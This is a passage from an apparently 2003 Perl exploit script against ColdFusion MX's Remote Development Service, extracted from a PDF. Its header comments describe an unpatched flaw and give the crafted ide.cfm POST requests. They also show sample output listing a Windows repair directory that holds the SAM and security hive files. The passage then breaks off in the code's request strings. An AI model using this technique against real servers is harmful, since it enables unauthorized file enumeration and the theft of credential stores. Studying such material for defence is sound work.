1 #!/usr/bin/perl
2 # RDS_c_Dump.pl
3 # By angry packet
4
5 ##
6 # THIS IS AN UNPATCHED VULNERABILITY − THIS IS AN UNPATCHED VULNERABILITY
7 #
8 # ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
9 # to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
10 # in like one full HTTP1/1 session witin netcat.
11 #
12 # I would like to point out that the ASPSESSID never validates so you can change this on the fly.
13 #
14 # Due to certian current situations I am not allowed to release full exploit code with
15 # ( READ, RETRIEVE, WRITE ) functions.
16 #
17 # Sample output:
18 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19 # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
20 #
21 # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
22 #
23 # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
24 # Content−Length: 37
25 # Please wait.. ..
26 # HTTP/1.1 100 Continue
27 # Server: Microsoft−IIS/5.0
28 # Date: Tue, 01 Jul 2003 10:30:43 GMT
29 #
30 # HTTP/1.1 200 OK
31 # Server: Microsoft−IIS/5.0
32 # Date: Tue, 01 Jul 2003 10:30:43 GMT
33 # Connection: close
34 # Content−Type: text/html
35 #
36 # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
37 # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
38 # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
39 # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
40 # Vic7im1@cipher:~/Scripts/RDS_Sploit$
41 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
42
43
44 use strict;
45 use IO::Socket;
46
47 use vars qw($response @clength @rarray);
48
49 ## Dreamweaver string requests to ide.cfm
50 ## −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
51 #1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:
Content−Length: 46
52 #2: 3:STR:7:C:/_mm/STR:1:*STR:0:
Content−Length: 28
Page 1/4
ColdFusion MX Remote Development Service Exploit
angry packet
07/07/2003
53 #3: 3:ST